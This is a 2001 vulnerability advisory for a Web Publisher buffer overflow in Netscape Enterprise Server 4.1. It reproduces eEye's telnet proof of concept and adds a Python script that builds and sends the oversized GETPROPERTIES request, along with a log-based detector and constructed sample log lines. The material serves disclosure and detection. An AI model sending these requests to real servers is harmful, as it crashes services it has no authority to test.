Reported May 16, 2001, by eEye Digital Security.
VERSION AFFECTED
· Netscape Enterprise Server 4.1 for Windows NT
DESCRIPTION
A buffer overflow in the Web Publisher feature of Netscape Enterprise Server 4.1 for Windows NT lets a remote attacker run code with system-level privileges on the server. The overflow is in how Web Publisher handles the Uniform Resource Identifier (URI) of a request: by specifying GETPROPERTIES, GETATTRIBUTENAMES, or any other publisher-specific method, an attacker can route an oversized URI into the vulnerable code. Sending a large buffer that contains executable code and a new instruction pointer therefore yields a remote system-level shell on the vulnerable server. Note that the overflow is reachable without authentication: the attacker only needs to reach the HTTP port. See eEye's Web site for more details.
DEMONSTRATION
eEye provided the following proof-of-concept scenario:
C:\>telnet www.example.com 80
Connecting To www.example.com... connected.
GETPROPERTIES /(buffer) HTTP/1.1
Host: Hostname
(enter)
(enter)
Where (buffer) is 2000 characters. The two (enter)s send the blank line that terminates the HTTP headers; on an unpatched server the request does not return a response, because the overflow crashes the server process.
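The same request, built as raw bytes so that it can be reproduced in a lab and, on the defensive side, recognised in an access log. This is an added example and not eEye's code; it assumes a filler byte of "A" (the advisory gives only the buffer length), an alert threshold of 1024 bytes for a publisher-method URI, and the constructed common-log-format sample lines embedded below.

```python
import re
import socket
from typing import List, Optional

# Web Publisher methods named in the advisory. eEye says any other
# publisher-specific method reaches the same code path; limiting the set
# to these two is an assumption of this example.
PUBLISHER_METHODS = {"GETPROPERTIES", "GETATTRIBUTENAMES"}

# Buffer length used in eEye's proof of concept.
POC_BUFFER_LEN = 2000

# Detection threshold (assumption): a publisher-method URI longer than this
# is far outside anything a legitimate Web Publisher client sends.
URI_ALERT_LEN = 1024


def build_poc_request(method: str = "GETPROPERTIES",
                      host: str = "www.example.com",
                      buffer_len: int = POC_BUFFER_LEN,
                      fill: bytes = b"A") -> bytes:
    """Reproduce the request eEye typed into telnet as raw bytes.

    Request line is "<method> /<buffer> HTTP/1.1" where the buffer is
    buffer_len copies of `fill` (the filler byte is an assumption; the
    advisory gives only the length).  A Host header and the blank line
    that ends the headers (the two "(enter)"s) follow.
    """
    if method not in PUBLISHER_METHODS:
        raise ValueError("not a Web Publisher method named in the advisory")
    uri = b"/" + fill * buffer_len
    return (method.encode("ascii") + b" " + uri + b" HTTP/1.1\r\n"
            + b"Host: " + host.encode("ascii") + b"\r\n"
            + b"\r\n")


def send_poc(host: str, port: int = 80, timeout: float = 5.0) -> Optional[bytes]:
    """Send the PoC to a server you are authorised to test.

    Returns the server's reply, or None if the connection drops or times
    out without one, which is the expected outcome against an unpatched
    server because the overflow crashes the process.  Not run by the tests.
    """
    payload = build_poc_request(host=host)
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(payload)
        try:
            data = s.recv(4096)
        except (socket.timeout, ConnectionError):
            return None
    return data or None


# Request line as it appears between the quotes of a common-log-format entry.
_REQUEST_LINE = re.compile(r"^([A-Z]+) (\S+) HTTP/\d\.\d$")


def is_publisher_overflow_attempt(request_line: str) -> bool:
    """True when a Web Publisher method carries an oversized URI,
    the shape of the eEye proof of concept."""
    m = _REQUEST_LINE.match(request_line)
    if not m:
        return False
    method, uri = m.group(1), m.group(2)
    return method in PUBLISHER_METHODS and len(uri) > URI_ALERT_LEN


# Constructed sample access log (common log format) for the scan below;
# these are not real log lines from any server.
SAMPLE_LOG = [
    '10.0.0.5 - - [16/May/2001:10:00:01 -0700] "GET /index.html HTTP/1.1" 200 1432',
    '10.0.0.5 - - [16/May/2001:10:00:02 -0700] "GETPROPERTIES /docs/report.html HTTP/1.1" 200 611',
    '10.0.0.9 - - [16/May/2001:10:00:03 -0700] "GETPROPERTIES /'
    + "A" * POC_BUFFER_LEN + ' HTTP/1.1" 500 0',
]


def scan_access_log(lines: List[str]) -> List[str]:
    """Return the client addresses of log entries matching the attack shape."""
    hits = []
    for line in lines:
        # The request line is the first double-quoted field of the entry.
        parts = line.split('"')
        if len(parts) < 3:
            continue
        if is_publisher_overflow_attempt(parts[1]):
            hits.append(line.split(" ", 1)[0])
    return hits


if __name__ == "__main__":
    print(build_poc_request()[:64], "...")
    print("suspicious clients:", scan_access_log(SAMPLE_LOG))
```

The log check keys on method plus URI length rather than on the 2000-byte figure, because an attacker who already controls the instruction pointer chooses the buffer size; a server that crashed on the request may not have logged it at all, so an abrupt gap in the access log after a publisher-method request is itself worth a look.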
VENDOR RESPONSE
The vendor, iPlanet, acknowledges the vulnerability and has released an NSAPI patch that corrects it. iPlanet further recommends that users apply Service Pack 8 (SP8) once it is made available.
CREDIT
Discovered by Riley Hassell.